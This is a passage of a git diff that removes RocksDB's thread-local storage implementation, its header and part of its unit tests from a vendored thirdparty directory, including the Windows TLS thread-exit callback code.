-  // static variables are initialized when their function are first called.
-  // As a result, the construction order of the function static variables
-  // can be controlled by properly invoke their first function calls in
-  // the right order.
-  //
-  // For instance, the following function contains a function static
-  // variable.  We place a dummy function call of this inside
-  // Env::Default() to ensure the construction order of the construction
-  // order.
-  static port::Mutex* Mutex();
-
-  // Returns the member mutex of the current StaticMeta.  In general,
-  // Mutex() should be used instead of this one.  However, in case where
-  // the static variable inside Instance() goes out of scope, MemberMutex()
-  // should be used.  One example is OnThreadExit() function.
-  port::Mutex* MemberMutex() { return &mutex_; }
-
-private:
-  // Get UnrefHandler for id with acquiring mutex
-  // REQUIRES: mutex locked
-  UnrefHandler GetHandler(uint32_t id);
-
-  // Triggered before a thread terminates
-  static void OnThreadExit(void* ptr);
-
-  // Add current thread's ThreadData to the global chain
-  // REQUIRES: mutex locked
-  void AddThreadData(ThreadData* d);
-
-  // Remove current thread's ThreadData from the global chain
-  // REQUIRES: mutex locked
-  void RemoveThreadData(ThreadData* d);
-
-  static ThreadData* GetThreadLocal();
-
-  uint32_t next_instance_id_;
-  // Used to recycle Ids in case ThreadLocalPtr is instantiated and destroyed
-  // frequently. This also prevents it from blowing up the vector space.
-  autovector<uint32_t> free_instance_ids_;
-  // Chain all thread local structure together. This is necessary since
-  // when one ThreadLocalPtr gets destroyed, we need to loop over each
-  // thread's version of pointer corresponding to that instance and
-  // call UnrefHandler for it.
-  ThreadData head_;
-
-  std::unordered_map<uint32_t, UnrefHandler> handler_map_;
-
-  // The private mutex.  Developers should always use Mutex() instead of
-  // using this variable directly.
-  port::Mutex mutex_;
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // Thread local storage
-  static __thread ThreadData* tls_;
-#endif
-
-  // Used to make thread exit trigger possible if !defined(OS_MACOSX).
-  // Otherwise, used to retrieve thread data.
-  pthread_key_t pthread_key_;
-};
-
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread ThreadData* ThreadLocalPtr::StaticMeta::tls_ = nullptr;
-#endif
-
-// Windows doesn't support a per-thread destructor with its
-// TLS primitives.  So, we build it manually by inserting a
-// function to be called on each thread's exit.
-// See http://www.codeproject.com/Articles/8113/Thread-Local-Storage-The-C-Way
-// and http://www.nynaeve.net/?p=183
-//
-// really we do this to have clear conscience since using TLS with thread-pools
-// is iffy
-// although OK within a request. But otherwise, threads have no identity in its
-// modern use.
-
-// This runs on windows only called from the System Loader
-#ifdef OS_WIN
-
-// Windows cleanup routine is invoked from a System Loader with a different
-// signature so we can not directly hookup the original OnThreadExit which is
-// private member
-// so we make StaticMeta class share with the us the address of the function so
-// we can invoke it.
-namespace wintlscleanup {
-
-// This is set to OnThreadExit in StaticMeta singleton constructor
-UnrefHandler thread_local_inclass_routine = nullptr;
-pthread_key_t thread_local_key = -1;
-
-// Static callback function to call with each thread termination.
-void NTAPI WinOnThreadExit(PVOID module, DWORD reason, PVOID reserved) {
-  // We decided to punt on PROCESS_EXIT
-  if (DLL_THREAD_DETACH == reason) {
-    if (thread_local_key != pthread_key_t(-1) && thread_local_inclass_routine != nullptr) {
-      void* tls = pthread_getspecific(thread_local_key);
-      if (tls != nullptr) {
-        thread_local_inclass_routine(tls);
-      }
-    }
-  }
-}
-
-}  // wintlscleanup
-
-// extern "C" suppresses C++ name mangling so we know the symbol name for the
-// linker /INCLUDE:symbol pragma above.
-extern "C" {
-
-#ifdef _MSC_VER
-// The linker must not discard thread_callback_on_exit.  (We force a reference
-// to this variable with a linker /include:symbol pragma to ensure that.) If
-// this variable is discarded, the OnThreadExit function will never be called.
-#ifdef _WIN64
-
-// .CRT section is merged with .rdata on x64 so it must be constant data.
-#pragma const_seg(".CRT$XLB")
-// When defining a const variable, it must have external linkage to be sure the
-// linker doesn't discard it.
-extern const PIMAGE_TLS_CALLBACK p_thread_callback_on_exit;
-const PIMAGE_TLS_CALLBACK p_thread_callback_on_exit =
-    wintlscleanup::WinOnThreadExit;
-// Reset the default section.
-#pragma const_seg()
-
-#pragma comment(linker, "/include:_tls_used")
-#pragma comment(linker, "/include:p_thread_callback_on_exit")
-
-#else  // _WIN64
-
-#pragma data_seg(".CRT$XLB")
-PIMAGE_TLS_CALLBACK p_thread_callback_on_exit = wintlscleanup::WinOnThreadExit;
-// Reset the default section.
-#pragma data_seg()
-
-#pragma comment(linker, "/INCLUDE:__tls_used")
-#pragma comment(linker, "/INCLUDE:_p_thread_callback_on_exit")
-
-#endif  // _WIN64
-
-#else
-// https://github.com/couchbase/gperftools/blob/master/src/windows/port.cc
-BOOL WINAPI DllMain(HINSTANCE h, DWORD dwReason, PVOID pv) {
-  if (dwReason == DLL_THREAD_DETACH)
-    wintlscleanup::WinOnThreadExit(h, dwReason, pv);
-  return TRUE;
-}
-#endif
-}  // extern "C"
-
-#endif  // OS_WIN
-
-void ThreadLocalPtr::InitSingletons() { ThreadLocalPtr::Instance(); }
-
-ThreadLocalPtr::StaticMeta* ThreadLocalPtr::Instance() {
-  // Here we prefer function static variable instead of global
-  // static variable as function static variable is initialized
-  // when the function is first call.  As a result, we can properly
-  // control their construction order by properly preparing their
-  // first function call.
-  //
-  // Note that here we decide to make "inst" a static pointer w/o deleting
-  // it at the end instead of a static variable.  This is to avoid the following
-  // destruction order disaster happens when a child thread using ThreadLocalPtr
-  // dies AFTER the main thread dies:  When a child thread happens to use
-  // ThreadLocalPtr, it will try to delete its thread-local data on its
-  // OnThreadExit when the child thread dies.  However, OnThreadExit depends
-  // on the following variable.  As a result, if the main thread dies before any
-  // child thread happen to use ThreadLocalPtr dies, then the destruction of
-  // the following variable will go first, then OnThreadExit, therefore causing
-  // invalid access.
-  //
-  // The above problem can be solved by using thread_local to store tls_ instead
-  // of using __thread.  The major difference between thread_local and __thread
-  // is that thread_local supports dynamic construction and destruction of
-  // non-primitive typed variables.  As a result, we can guarantee the
-  // destruction order even when the main thread dies before any child threads.
-  // However, thread_local is not supported in all compilers that accept -std=c++11
-  // (e.g., eg Mac with XCode < 8. XCode 8+ supports thread_local).
-  static ThreadLocalPtr::StaticMeta* inst = new ThreadLocalPtr::StaticMeta();
-  return inst;
-}
-
-port::Mutex* ThreadLocalPtr::StaticMeta::Mutex() { return &Instance()->mutex_; }
-
-void ThreadLocalPtr::StaticMeta::OnThreadExit(void* ptr) {
-  auto* tls = static_cast<ThreadData*>(ptr);
-  assert(tls != nullptr);
-
-  // Use the cached StaticMeta::Instance() instead of directly calling
-  // the variable inside StaticMeta::Instance() might already go out of
-  // scope here in case this OnThreadExit is called after the main thread
-  // dies.
-  auto* inst = tls->inst;
-  pthread_setspecific(inst->pthread_key_, nullptr);
-
-  MutexLock l(inst->MemberMutex());
-  inst->RemoveThreadData(tls);
-  // Unref stored pointers of current thread from all instances
-  uint32_t id = 0;
-  for (auto& e : tls->entries) {
-    void* raw = e.ptr.load();
-    if (raw != nullptr) {
-      auto unref = inst->GetHandler(id);
-      if (unref != nullptr) {
-        unref(raw);
-      }
-    }
-    ++id;
-  }
-  // Delete thread local structure no matter if it is Mac platform
-  delete tls;
-}
-
-ThreadLocalPtr::StaticMeta::StaticMeta() : next_instance_id_(0), head_(this) {
-  if (pthread_key_create(&pthread_key_, &OnThreadExit) != 0) {
-    abort();
-  }
-
-  // OnThreadExit is not getting called on the main thread.
-  // Call through the static destructor mechanism to avoid memory leak.
-  //
-  // Caveats: ~A() will be invoked _after_ ~StaticMeta for the global
-  // singleton (destructors are invoked in reverse order of constructor
-  // _completion_); the latter must not mutate internal members. This
-  // cleanup mechanism inherently relies on use-after-release of the
-  // StaticMeta, and is brittle with respect to compiler-specific handling
-  // of memory backing destructed statically-scoped objects. Perhaps
-  // registering with atexit(3) would be more robust.
-  //
-// This is not required on Windows.
-#if !defined(OS_WIN)
-  static struct A {
-    ~A() {
-#ifndef ROCKSDB_SUPPORT_THREAD_LOCAL
-      ThreadData* tls_ =
-        static_cast<ThreadData*>(pthread_getspecific(Instance()->pthread_key_));
-#endif
-      if (tls_) {
-        OnThreadExit(tls_);
-      }
-    }
-  } a;
-#endif  // !defined(OS_WIN)
-
-  head_.next = &head_;
-  head_.prev = &head_;
-
-#ifdef OS_WIN
-  // Share with Windows its cleanup routine and the key
-  wintlscleanup::thread_local_inclass_routine = OnThreadExit;
-  wintlscleanup::thread_local_key = pthread_key_;
-#endif
-}
-
-void ThreadLocalPtr::StaticMeta::AddThreadData(ThreadData* d) {
-  Mutex()->AssertHeld();
-  d->next = &head_;
-  d->prev = head_.prev;
-  head_.prev->next = d;
-  head_.prev = d;
-}
-
-void ThreadLocalPtr::StaticMeta::RemoveThreadData(
-    ThreadData* d) {
-  Mutex()->AssertHeld();
-  d->next->prev = d->prev;
-  d->prev->next = d->next;
-  d->next = d->prev = d;
-}
-
-ThreadData* ThreadLocalPtr::StaticMeta::GetThreadLocal() {
-#ifndef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // Make this local variable name look like a member variable so that we
-  // can share all the code below
-  ThreadData* tls_ =
-      static_cast<ThreadData*>(pthread_getspecific(Instance()->pthread_key_));
-#endif
-
-  if (UNLIKELY(tls_ == nullptr)) {
-    auto* inst = Instance();
-    tls_ = new ThreadData(inst);
-    {
-      // Register it in the global chain, needs to be done before thread exit
-      // handler registration
-      MutexLock l(Mutex());
-      inst->AddThreadData(tls_);
-    }
-    // Even it is not OS_MACOSX, need to register value for pthread_key_ so that
-    // its exit handler will be triggered.
-    if (pthread_setspecific(inst->pthread_key_, tls_) != 0) {
-      {
-        MutexLock l(Mutex());
-        inst->RemoveThreadData(tls_);
-      }
-      delete tls_;
-      abort();
-    }
-  }
-  return tls_;
-}
-
-void* ThreadLocalPtr::StaticMeta::Get(uint32_t id) const {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    return nullptr;
-  }
-  return tls->entries[id].ptr.load(std::memory_order_acquire);
-}
-
-void ThreadLocalPtr::StaticMeta::Reset(uint32_t id, void* ptr) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  tls->entries[id].ptr.store(ptr, std::memory_order_release);
-}
-
-void* ThreadLocalPtr::StaticMeta::Swap(uint32_t id, void* ptr) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  return tls->entries[id].ptr.exchange(ptr, std::memory_order_acquire);
-}
-
-bool ThreadLocalPtr::StaticMeta::CompareAndSwap(uint32_t id, void* ptr,
-    void*& expected) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  return tls->entries[id].ptr.compare_exchange_strong(
-      expected, ptr, std::memory_order_release, std::memory_order_relaxed);
-}
-
-void ThreadLocalPtr::StaticMeta::Scrape(uint32_t id, autovector<void*>* ptrs,
-    void* const replacement) {
-  MutexLock l(Mutex());
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr =
-          t->entries[id].ptr.exchange(replacement, std::memory_order_acquire);
-      if (ptr != nullptr) {
-        ptrs->push_back(ptr);
-      }
-    }
-  }
-}
-
-void ThreadLocalPtr::StaticMeta::Fold(uint32_t id, FoldFunc func, void* res) {
-  MutexLock l(Mutex());
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr = t->entries[id].ptr.load();
-      if (ptr != nullptr) {
-        func(ptr, res);
-      }
-    }
-  }
-}
-
-uint32_t ThreadLocalPtr::TEST_PeekId() {
-  return Instance()->PeekId();
-}
-
-void ThreadLocalPtr::StaticMeta::SetHandler(uint32_t id, UnrefHandler handler) {
-  MutexLock l(Mutex());
-  handler_map_[id] = handler;
-}
-
-UnrefHandler ThreadLocalPtr::StaticMeta::GetHandler(uint32_t id) {
-  Mutex()->AssertHeld();
-  auto iter = handler_map_.find(id);
-  if (iter == handler_map_.end()) {
-    return nullptr;
-  }
-  return iter->second;
-}
-
-uint32_t ThreadLocalPtr::StaticMeta::GetId() {
-  MutexLock l(Mutex());
-  if (free_instance_ids_.empty()) {
-    return next_instance_id_++;
-  }
-
-  uint32_t id = free_instance_ids_.back();
-  free_instance_ids_.pop_back();
-  return id;
-}
-
-uint32_t ThreadLocalPtr::StaticMeta::PeekId() const {
-  MutexLock l(Mutex());
-  if (!free_instance_ids_.empty()) {
-    return free_instance_ids_.back();
-  }
-  return next_instance_id_;
-}
-
-void ThreadLocalPtr::StaticMeta::ReclaimId(uint32_t id) {
-  // This id is not used, go through all thread local data and release
-  // corresponding value
-  MutexLock l(Mutex());
-  auto unref = GetHandler(id);
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr = t->entries[id].ptr.exchange(nullptr);
-      if (ptr != nullptr && unref != nullptr) {
-        unref(ptr);
-      }
-    }
-  }
-  handler_map_[id] = nullptr;
-  free_instance_ids_.push_back(id);
-}
-
-ThreadLocalPtr::ThreadLocalPtr(UnrefHandler handler)
-    : id_(Instance()->GetId()) {
-  if (handler != nullptr) {
-    Instance()->SetHandler(id_, handler);
-  }
-}
-
-ThreadLocalPtr::~ThreadLocalPtr() {
-  Instance()->ReclaimId(id_);
-}
-
-void* ThreadLocalPtr::Get() const {
-  return Instance()->Get(id_);
-}
-
-void ThreadLocalPtr::Reset(void* ptr) {
-  Instance()->Reset(id_, ptr);
-}
-
-void* ThreadLocalPtr::Swap(void* ptr) {
-  return Instance()->Swap(id_, ptr);
-}
-
-bool ThreadLocalPtr::CompareAndSwap(void* ptr, void*& expected) {
-  return Instance()->CompareAndSwap(id_, ptr, expected);
-}
-
-void ThreadLocalPtr::Scrape(autovector<void*>* ptrs, void* const replacement) {
-  Instance()->Scrape(id_, ptrs, replacement);
-}
-
-void ThreadLocalPtr::Fold(FoldFunc func, void* res) {
-  Instance()->Fold(id_, func, res);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_local.h b/thirdparty/rocksdb/util/thread_local.h
deleted file mode 100644
index 1ca5b10..0000000
--- a/thirdparty/rocksdb/util/thread_local.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <unordered_map>
-#include <vector>
-
-#include "util/autovector.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-// Cleanup function that will be called for a stored thread local
-// pointer (if not NULL) when one of the following happens:
-// (1) a thread terminates
-// (2) a ThreadLocalPtr is destroyed
-typedef void (*UnrefHandler)(void* ptr);
-
-// ThreadLocalPtr stores only values of pointer type.  Different from
-// the usual thread-local-storage, ThreadLocalPtr has the ability to
-// distinguish data coming from different threads and different
-// ThreadLocalPtr instances.  For example, if a regular thread_local
-// variable A is declared in DBImpl, two DBImpl objects would share
-// the same A.  However, a ThreadLocalPtr that is defined under the
-// scope of DBImpl can avoid such confliction.  As a result, its memory
-// usage would be O(# of threads * # of ThreadLocalPtr instances).
-class ThreadLocalPtr {
- public:
-  explicit ThreadLocalPtr(UnrefHandler handler = nullptr);
-
-  ~ThreadLocalPtr();
-
-  // Return the current pointer stored in thread local
-  void* Get() const;
-
-  // Set a new pointer value to the thread local storage.
-  void Reset(void* ptr);
-
-  // Atomically swap the supplied ptr and return the previous value
-  void* Swap(void* ptr);
-
-  // Atomically compare the stored value with expected. Set the new
-  // pointer value to thread local only if the comparison is true.
-  // Otherwise, expected returns the stored value.
-  // Return true on success, false on failure
-  bool CompareAndSwap(void* ptr, void*& expected);
-
-  // Reset all thread local data to replacement, and return non-nullptr
-  // data for all existing threads
-  void Scrape(autovector<void*>* ptrs, void* const replacement);
-
-  typedef std::function<void(void*, void*)> FoldFunc;
-  // Update res by applying func on each thread-local value. Holds a lock that
-  // prevents unref handler from running during this call, but clients must
-  // still provide external synchronization since the owning thread can
-  // access the values without internal locking, e.g., via Get() and Reset().
-  void Fold(FoldFunc func, void* res);
-
-  // Add here for testing
-  // Return the next available Id without claiming it
-  static uint32_t TEST_PeekId();
-
-  // Initialize the static singletons of the ThreadLocalPtr.
-  //
-  // If this function is not called, then the singletons will be
-  // automatically initialized when they are used.
-  //
-  // Calling this function twice or after the singletons have been
-  // initialized will be no-op.
-  static void InitSingletons();
-
-  class StaticMeta;
-
-private:
-
-  static StaticMeta* Instance();
-
-  const uint32_t id_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_local_test.cc b/thirdparty/rocksdb/util/thread_local_test.cc
deleted file mode 100644
index 6fee5ea..0000000
--- a/thirdparty/rocksdb/util/thread_local_test.cc
+++ /dev/null
@@ -1,582 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <thread>
-#include <atomic>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "port/port.h"
-#include "util/autovector.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class ThreadLocalTest : public testing::Test {
- public:
-  ThreadLocalTest() : env_(Env::Default()) {}
-
-  Env* env_;
-};
-
-namespace {
-
-struct Params {
-  Params(port::Mutex* m, port::CondVar* c, int* u, int n,
-         UnrefHandler handler = nullptr)
-      : mu(m),
-        cv(c),
-        unref(u),
-        total(n),
-        started(0),
-        completed(0),
-        doWrite(false),
-        tls1(handler),
-        tls2(nullptr) {}
-
-  port::Mutex* mu;
-  port::CondVar* cv;
-  int* unref;
-  int total;
-  int started;
-  int completed;
-  bool doWrite;
-  ThreadLocalPtr tls1;
-  ThreadLocalPtr* tls2;
-};
-
-class IDChecker : public ThreadLocalPtr {
-public:
-  static uint32_t PeekId() {
-    return TEST_PeekId();
-  }
-};
-
-}  // anonymous namespace
-
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-TEST_F(ThreadLocalTest, UniqueIdTest) {
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-  // New ThreadLocal instance bumps id by 1
-  {
-    // Id used 0
-    Params p1(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-    // Id used 1
-    Params p2(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 2u);
-    // Id used 2
-    Params p3(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 3u);
-    // Id used 3
-    Params p4(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 4u);
-  }
-  // id 3, 2, 1, 0 are in the free queue in order
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  // pick up 0
-  Params p1(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 1u);
-  // pick up 1
-  Params* p2 = new Params(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 2u);
-  // pick up 2
-  Params p3(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-  // return up 1
-  delete p2;
-  ASSERT_EQ(IDChecker::PeekId(), 1u);
-  // Now we have 3, 1 in queue
-  // pick up 1
-  Params p4(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-  // pick up 3
-  Params p5(&mu, &cv, nullptr, 1u);
-  // next new id
-  ASSERT_EQ(IDChecker::PeekId(), 4u);
-  // After exit, id sequence in queue:
-  // 3, 1, 2, 0
-}
-#endif  // __clang_analyzer__
-
-TEST_F(ThreadLocalTest, SequentialReadWriteTest) {
-  // global id list carries over 3, 1, 2, 0
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-  Params p(&mu, &cv, nullptr, 1);
-  ThreadLocalPtr tls2;
-  p.tls2 = &tls2;
-
-  auto func = [](void* ptr) {
-    auto& params = *static_cast<Params*>(ptr);
-
-    ASSERT_TRUE(params.tls1.Get() == nullptr);
-    params.tls1.Reset(reinterpret_cast<int*>(1));
-    ASSERT_TRUE(params.tls1.Get() == reinterpret_cast<int*>(1));
-    params.tls1.Reset(reinterpret_cast<int*>(2));
-    ASSERT_TRUE(params.tls1.Get() == reinterpret_cast<int*>(2));
-
-    ASSERT_TRUE(params.tls2->Get() == nullptr);
-    params.tls2->Reset(reinterpret_cast<int*>(1));
-    ASSERT_TRUE(params.tls2->Get() == reinterpret_cast<int*>(1));
-    params.tls2->Reset(reinterpret_cast<int*>(2));
-    ASSERT_TRUE(params.tls2->Get() == reinterpret_cast<int*>(2));
-
-    params.mu->Lock();
-    ++(params.completed);
-    params.cv->SignalAll();
-    params.mu->Unlock();
-  };
-
-  for (int iter = 0; iter < 1024; ++iter) {
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-    // Another new thread, read/write should not see value from previous thread
-    env_->StartThread(func, static_cast<void*>(&p));
-    mu.Lock();
-    while (p.completed != iter + 1) {
-      cv.Wait();
-    }
-    mu.Unlock();
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-  }
-}
-
-TEST_F(ThreadLocalTest, ConcurrentReadWriteTest) {
-  // global id list carries over 3, 1, 2, 0
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  ThreadLocalPtr tls2;
-  port::Mutex mu1;
-  port::CondVar cv1(&mu1);
-  Params p1(&mu1, &cv1, nullptr, 16);
-  p1.tls2 = &tls2;
-
-  port::Mutex mu2;
-  port::CondVar cv2(&mu2);
-  Params p2(&mu2, &cv2, nullptr, 16);
-  p2.doWrite = true;
-  p2.tls2 = &tls2;
-
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    // Size_T switches size along with the ptr size
-    // we want to cast to.
-    size_t own = ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    // Let write threads write a different value from the read threads
-    if (p.doWrite) {
-      own += 8192;
-    }
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    auto* env = Env::Default();
-    auto start = env->NowMicros();
-
-    p.tls1.Reset(reinterpret_cast<size_t*>(own));
-    p.tls2->Reset(reinterpret_cast<size_t*>(own + 1));
-    // Loop for 1 second
-    while (env->NowMicros() - start < 1000 * 1000) {
-      for (int iter = 0; iter < 100000; ++iter) {
-        ASSERT_TRUE(p.tls1.Get() == reinterpret_cast<size_t*>(own));
-        ASSERT_TRUE(p.tls2->Get() == reinterpret_cast<size_t*>(own + 1));
-        if (p.doWrite) {
-          p.tls1.Reset(reinterpret_cast<size_t*>(own));
-          p.tls2->Reset(reinterpret_cast<size_t*>(own + 1));
-        }
-      }
-    }
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-    p.mu->Unlock();
-  };
-
-  // Initiate 2 instnaces: one keeps writing and one keeps reading.
-  // The read instance should not see data from the write instance.
-  // Each thread local copy of the value are also different from each
-  // other.
-  for (int th = 0; th < p1.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&p1));
-  }
-  for (int th = 0; th < p2.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&p2));
-  }
-
-  mu1.Lock();
-  while (p1.completed != p1.total) {
-    cv1.Wait();
-  }
-  mu1.Unlock();
-
-  mu2.Lock();
-  while (p2.completed != p2.total) {
-    cv2.Wait();
-  }
-  mu2.Unlock();
-
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-}
-
-TEST_F(ThreadLocalTest, Unref) {
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  auto unref = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    p.mu->Lock();
-    ++(*p.unref);
-    p.mu->Unlock();
-  };
-
-  // Case 0: no unref triggered if ThreadLocalPtr is never accessed
-  auto func0 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func0, static_cast<void*>(&p));
-    }
-    env_->WaitForJoin();
-    ASSERT_EQ(unref_count, 0);
-  }
-
-  // Case 1: unref triggered by thread exit
-  auto func1 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    ThreadLocalPtr tls2(unref);
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = &tls2;
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func1, static_cast<void*>(&p));
-    }
-
-    env_->WaitForJoin();
-
-    // N threads x 2 ThreadLocal instance cleanup on thread exit
-    ASSERT_EQ(unref_count, 2 * p.total);
-  }
-
-  // Case 2: unref triggered by ThreadLocal instance destruction
-  auto func2 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = new ThreadLocalPtr(unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func2, static_cast<void*>(&p));
-    }
-
-    // Wait for all threads to finish using Params
-    mu.Lock();
-    while (p.completed != p.total) {
-      cv.Wait();
-    }
-    mu.Unlock();
-
-    // Now destroy one ThreadLocal instance
-    delete p.tls2;
-    p.tls2 = nullptr;
-    // instance destroy for N threads
-    ASSERT_EQ(unref_count, p.total);
-
-    // Signal to exit
-    mu.Lock();
-    p.completed = 0;
-    cv.SignalAll();
-    mu.Unlock();
-    env_->WaitForJoin();
-    // additional N threads exit unref for the left instance
-    ASSERT_EQ(unref_count, 2 * p.total);
-  }
-}
-
-TEST_F(ThreadLocalTest, Swap) {
-  ThreadLocalPtr tls;
-  tls.Reset(reinterpret_cast<void*>(1));
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Swap(nullptr)), 1);
-  ASSERT_TRUE(tls.Swap(reinterpret_cast<void*>(2)) == nullptr);
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Get()), 2);
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Swap(reinterpret_cast<void*>(3))), 2);
-}
-
-TEST_F(ThreadLocalTest, Scrape) {
-  auto unref = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    p.mu->Lock();
-    ++(*p.unref);
-    p.mu->Unlock();
-  };
-
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = new ThreadLocalPtr(unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func, static_cast<void*>(&p));
-    }
-
-    // Wait for all threads to finish using Params
-    mu.Lock();
-    while (p.completed != p.total) {
-      cv.Wait();
-    }
